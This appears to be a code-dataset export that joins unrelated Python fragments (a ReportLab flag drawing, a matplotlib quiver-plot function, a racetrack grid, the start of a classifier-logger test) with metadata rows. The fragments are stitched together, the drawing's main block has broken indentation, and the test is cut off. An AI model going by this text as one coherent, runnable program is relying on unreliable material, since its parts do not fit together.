v0.add(Polygon(points=[0,88.75,0,100,22.5,100,200,11.25,200,0,177.5,0],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,93.33333,60,65,70,65,0,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,70,35,80,35,10,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,100,130,65,120,65,190,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,6.666667,140,35,130,35,200,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(84,0,32,100,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,35,200,30,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(90,0,20,100,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,40,200,20,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (.1,0,0,.1,110,85.71429)
v0.add(Rect(-0.05,-0.05,20.15,10.1,rx=0,ry=0,fillColor=None,fillOpacity=None,strokeColor=None,strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,0,200,100,rx=0,ry=0,fillColor=Color(0,0,.501961,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,22.5,0,200,88.75,200,100,177.5,100,0,11.25],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,88.75,0,100,22.5,100,200,11.25,200,0,177.5,0],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,93.33333,60,65,70,65,0,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,70,35,80,35,10,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,100,130,65,120,65,190,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,6.666667,140,35,130,35,200,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(84,0,32,100,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,35,200,30,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(90,0,20,100,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,40,200,20,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (.1,0,0,.1,170,103.5714)
v0.add(Rect(-0.05,-0.05,20.15,10.1,rx=0,ry=0,fillColor=None,fillOpacity=None,strokeColor=None,strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,0,200,100,rx=0,ry=0,fillColor=Color(0,0,.501961,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,22.5,0,200,88.75,200,100,177.5,100,0,11.25],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,88.75,0,100,22.5,100,200,11.25,200,0,177.5,0],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,93.33333,60,65,70,65,0,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,70,35,80,35,10,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,100,130,65,120,65,190,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,6.666667,140,35,130,35,200,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(84,0,32,100,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,35,200,30,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(90,0,20,100,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,40,200,20,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (.1,0,0,.1,200,85.71429)
v0.add(Rect(-0.05,-0.05,20.15,10.1,rx=0,ry=0,fillColor=None,fillOpacity=None,strokeColor=None,strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,0,200,100,rx=0,ry=0,fillColor=Color(0,0,.501961,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,22.5,0,200,88.75,200,100,177.5,100,0,11.25],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,88.75,0,100,22.5,100,200,11.25,200,0,177.5,0],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,93.33333,60,65,70,65,0,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,70,35,80,35,10,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,100,130,65,120,65,190,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,6.666667,140,35,130,35,200,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(84,0,32,100,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,35,200,30,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(90,0,20,100,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,40,200,20,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (.1,0,0,.1,260,139.2857)
v0.add(Rect(-0.05,-0.05,20.15,10.1,rx=0,ry=0,fillColor=None,fillOpacity=None,strokeColor=None,strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,0,200,100,rx=0,ry=0,fillColor=Color(0,0,.501961,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,22.5,0,200,88.75,200,100,177.5,100,0,11.25],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,88.75,0,100,22.5,100,200,11.25,200,0,177.5,0],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,93.33333,60,65,70,65,0,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,70,35,80,35,10,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,100,130,65,120,65,190,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,6.666667,140,35,130,35,200,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(84,0,32,100,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,35,200,30,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(90,0,20,100,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,40,200,20,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0=self._nn(Group())
v0.transform = (.1,0,0,.1,290,157.1429)
v0.add(Rect(-0.05,-0.05,20.15,10.1,rx=0,ry=0,fillColor=None,fillOpacity=None,strokeColor=None,strokeWidth=.1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,0,200,100,rx=0,ry=0,fillColor=Color(0,0,.501961,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,22.5,0,200,88.75,200,100,177.5,100,0,11.25],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,88.75,0,100,22.5,100,200,11.25,200,0,177.5,0],fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,93.33333,60,65,70,65,0,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[0,0,70,35,80,35,10,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,100,130,65,120,65,190,100],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Polygon(points=[200,6.666667,140,35,130,35,200,0],fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(84,0,32,100,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,35,200,30,rx=0,ry=0,fillColor=Color(.960784,1,.980392,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(90,0,20,100,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
v0.add(Rect(0,40,200,20,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=None,strokeWidth=0,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
if __name__=="__main__": #NORUNTESTS
ExplodedDrawing_Drawing().save(formats=['pdf'],outDir='.',fnRoot=None)
| 156.004673
| 251
| 0.794608
| 5,404
| 33,385
| 4.900814
| 0.023871
| 0.015859
| 0.146957
| 0.188944
| 0.972512
| 0.96647
| 0.964809
| 0.960958
| 0.960693
| 0.959409
| 0
| 0.139802
| 0.020848
| 33,385
| 213
| 252
| 156.737089
| 0.670378
| 0.001677
| 0
| 0.688995
| 1
| 0
| 0.007501
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004785
| false
| 0
| 0.009569
| 0
| 0.019139
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
f0de349a7ae206b0cb5e6d2f6320be9dbb0f42b6
| 2,946
|
py
|
Python
|
draw_test.py
|
maker-tj/WA-SUPER-BPD
|
afe8977cb3fb3ba3db2d7f3361e286dd4221fa7d
|
[
"Apache-2.0"
] | null | null | null |
draw_test.py
|
maker-tj/WA-SUPER-BPD
|
afe8977cb3fb3ba3db2d7f3361e286dd4221fa7d
|
[
"Apache-2.0"
] | null | null | null |
draw_test.py
|
maker-tj/WA-SUPER-BPD
|
afe8977cb3fb3ba3db2d7f3361e286dd4221fa7d
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import matplotlib
matplotlib.use('TkAgg')
import matplotlib.pyplot as plt
from matplotlib.pyplot import MultipleLocator
def draw_direction(image, direction, b_heigh, b_width, M, N):
heigh = M #image.shape[0]
width = N #image.shape[1]
plt.figure(1)
x0 = np.arange(0, width, 1)
x1 = np.arange(0, heigh, 1)
X, Y = np.meshgrid(x0, x1)
X = X.flatten()
Y = Y.flatten()
plt.xticks(x0)
plt.yticks(x1)
ax = plt.gca()
grad1 = direction[:, b_heigh:b_heigh+M, b_width:b_width+N]
grad = grad1.transpose(1, 2, 0)
grad = list(reversed(grad.tolist()))
grad = np.array(grad)
grad = grad.transpose(2, 0, 1)
grad_0 = grad[0].flatten()
grad_1 = grad[1].flatten()
plt.quiver(X, Y, grad_0, grad_1, angles="xy", color="#666666")
# Labels for major ticks
ax.set_xticklabels(np.arange(1, width+1, 1))
ax.set_yticklabels(np.arange(1, heigh+1, 1))
# Major ticks
ax.set_xticks(np.arange(0, width, 1))
ax.set_yticks(np.arange(0, heigh, 1))
# Minor ticks
ax.set_xticks(np.arange(-.5, width-0.5, 1), minor=True)
ax.set_yticks(np.arange(-.5, heigh-0.5, 1), minor=True)
image_crop = image[b_heigh:b_heigh+M,b_width:b_width+N,:]
plt.grid(linewidth=0.15, which='minor', axis='both')
c = list(reversed(image_crop.tolist()))
plt.imshow(c, origin='lower',aspect='equal', alpha = 1)
plt.draw()
plt.savefig('images/my_images/1.png')
plt.show()
###########################################
plt.figure(2)
x0 = np.arange(0, width, 1)
x1 = np.arange(0, heigh, 1)
X, Y = np.meshgrid(x0, x1)
X = X.flatten()
Y = Y.flatten()
plt.xticks(x0)
plt.yticks(x1)
ax = plt.gca()
grad1 = direction[:, b_heigh:b_heigh+M, b_width:b_width+N]
grad = grad1.transpose(1, 2, 0)
grad = list(reversed(grad.tolist()))
grad = np.array(grad)
grad = grad.transpose(2, 0, 1)
grad_0 = grad[0].flatten()
grad_1 = grad[1].flatten()
grad_norm = np.sqrt(grad_0 ** 2 + grad_1 ** 2) + 0.000001
aa = grad_0 / grad_norm
plt.quiver(X, Y, grad_0 / grad_norm, grad_1 / grad_norm, angles="xy", color="#666666")
# Labels for major ticks
ax.set_xticklabels(np.arange(1, width+1, 1))
ax.set_yticklabels(np.arange(1, heigh+1, 1))
# Major ticks
ax.set_xticks(np.arange(0, width, 1))
ax.set_yticks(np.arange(0, heigh, 1))
# Minor ticks
ax.set_xticks(np.arange(-.5, width-0.5, 1), minor=True)
ax.set_yticks(np.arange(-.5, heigh-0.5, 1), minor=True)
image_crop = image[b_heigh:b_heigh+M, b_width:b_width+N, :]
plt.grid(linewidth=0.15, which='minor', axis='both')
c = list(reversed(image_crop.tolist()))
plt.imshow(c, origin='lower',aspect='equal', alpha = 1)
plt.draw()
plt.savefig('images/my_images/2.png')
plt.show()
| 30.061224
| 91
| 0.593007
| 471
| 2,946
| 3.598726
| 0.171975
| 0.075516
| 0.042478
| 0.033038
| 0.821239
| 0.821239
| 0.821239
| 0.79764
| 0.79764
| 0.79764
| 0
| 0.053603
| 0.227427
| 2,946
| 97
| 92
| 30.371134
| 0.691125
| 0.041412
| 0
| 0.771429
| 0
| 0
| 0.039252
| 0.016449
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014286
| false
| 0
| 0.057143
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0b1d4ae8ded7ebac3827f6b73f713a5dd46f0786
| 1,960
|
py
|
Python
|
chap7/MP-HW7/racetracks.py
|
tzhangZJU/Motion-Planning-Course
|
d8a94700394dbf48200b0b2291672bd5ec670eaa
|
[
"MIT"
] | 119
|
2019-10-14T01:54:08.000Z
|
2022-03-22T06:03:50.000Z
|
chap7/MP-HW7/racetracks.py
|
sdurmustalipoglu/Motion-Planning-Course
|
f8e8034496a1f300f97486d06aa567d813ddeb27
|
[
"MIT"
] | 1
|
2019-10-23T04:41:54.000Z
|
2020-01-24T03:46:47.000Z
|
chap7/MP-HW7/racetracks.py
|
Forrest-Z/Motion-Planning-Course
|
d2ff6c96bbe3944c21a08af65e82fc44e882d506
|
[
"MIT"
] | 68
|
2019-10-22T12:08:23.000Z
|
2022-03-31T07:39:27.000Z
|
# Problem definition
import numpy as np
START_LINE = [[0, 3], [0, 4], [0, 5], [0, 6]]
FINISH_LINE = [[34, 11], [33, 11], [32, 11]]
# FINISH_LINE = [ [32, 11]]
# acc
ACTION_SPACE = [[1, 1], [0, 1], [1, 0], [0, 0], [-1, 0], [0, -1], [1, -1], [-1, 1], [-1, -1]]
# ACTION_SPACE = [[0, 1], [1, 0], [0, 0], [-1, 0], [0, -1]]
action_assert_list = [-1, 0, 1]
# action_assert_list = [-1, 0,1,2,3]
FINISH = 3
START = 2
FREE = 0
OCCUPIED = 1
OUTBOUND = -1
race_track = np.array([
[1, 1, 1, 2, 2, 2, 2, 1, 1, 1, 1, 1],
[1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3]
], dtype=np.int32)
| 35
| 93
| 0.342857
| 512
| 1,960
| 1.292969
| 0.064453
| 0.607251
| 0.738671
| 0.767372
| 0.720544
| 0.720544
| 0.720544
| 0.720544
| 0.663142
| 0.654079
| 0
| 0.374327
| 0.336224
| 1,960
| 55
| 94
| 35.636364
| 0.134512
| 0.071939
| 0
| 0.702128
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021277
| 1
| 0
| false
| 0
| 0.021277
| 0
| 0.021277
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
9bcf29c66549fdf0b9bfb767c53f2ae45dac72d3
| 6,804
|
py
|
Python
|
tests/train/test_consumers.py
|
crim-ca/thelper
|
1415144cf70e4492c2ef00f834e2b9a988064a76
|
[
"Apache-2.0"
] | null | null | null |
tests/train/test_consumers.py
|
crim-ca/thelper
|
1415144cf70e4492c2ef00f834e2b9a988064a76
|
[
"Apache-2.0"
] | null | null | null |
tests/train/test_consumers.py
|
crim-ca/thelper
|
1415144cf70e4492c2ef00f834e2b9a988064a76
|
[
"Apache-2.0"
] | 1
|
2020-02-17T14:14:46.000Z
|
2020-02-17T14:14:46.000Z
|
import numpy as np
import torch
import thelper
def test_classif_logger():
# classification results are expected in 1D format; lets build some dummy data...
batch_size = 16
iter_count = 32
input_shape = (3, 32, 32)
class_count = 10
class_names = [str(i) for i in range(class_count)]
task = thelper.tasks.Classification(class_names, "input", "gt", ["idx"])
consumer_config = {"consumer": {
"type": "thelper.train.utils.ClassifLogger",
"params": {"top_k": 3, "report_count": 10,
"class_names": class_names, "log_keys": ["idx"]}
}}
consumers = thelper.train.create_consumers(consumer_config)
consumer = consumers["consumer"]
assert isinstance(consumer, thelper.train.utils.ClassifLogger)
assert consumer.top_k == 3
assert consumer.report_count == 10
assert consumer.class_names == class_names
assert consumer.report() is None
assert repr(consumer)
inputs, targets, preds = [], [], []
tot_idx = 0
for iter_idx in range(iter_count):
# set batch size to one for 'lingering' sample in last minibatch
curr_batch_size = batch_size if iter_idx < iter_count - 1 else 1
inputs.append(torch.randn((curr_batch_size, *input_shape)))
